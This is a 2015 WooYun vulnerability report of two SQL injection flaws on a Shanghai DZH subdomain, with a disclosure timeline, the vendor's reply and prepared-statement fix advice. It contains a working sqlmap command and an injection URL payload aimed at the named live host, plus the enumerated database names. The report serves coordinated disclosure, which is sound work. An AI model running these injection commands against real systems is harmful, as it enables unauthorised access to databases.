当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115736

漏洞标题:上海大智慧某站SQL注入2处

相关厂商:上海大智慧

漏洞作者: D&G

提交时间:2015-05-24 21:12

修复时间:2015-07-09 08:54

公开时间:2015-07-09 08:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

求1rank sqli

详细说明:

参数存在sql注入。poc:
1
python sqlmap.py -u http://xxdl.gw.com.cn/iframe.jsp\?currentPage\=2\&search\=\&subtype\=1\&type\=4 -p subtype --proxy=socks5://127.0.0.1:1080 -D newweb --tables
2 xxdl.gw.com.cn/marketIframe.jsp?currentPage=2&search=&subtype=&type=0%20AND%203*2*1%3d6%20AND%20356%3d356

漏洞证明:

数据库相关信息证明

[16:25:48] [INFO] retrieved: userdb
available databases [9]:
[*] distribution
[*] gwmis_new
[*] master
[*] model
[*] msdb
[*] newweb
[*] show
[*] tempdb
[*] userdb

修复方案:

SQL注入的防御方法:采用预编译

版权声明:转载请注明来源 D&G@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-05-25 08:53

厂商回复:

测试环境,已通知测试负责人处理中。

最新状态:

暂无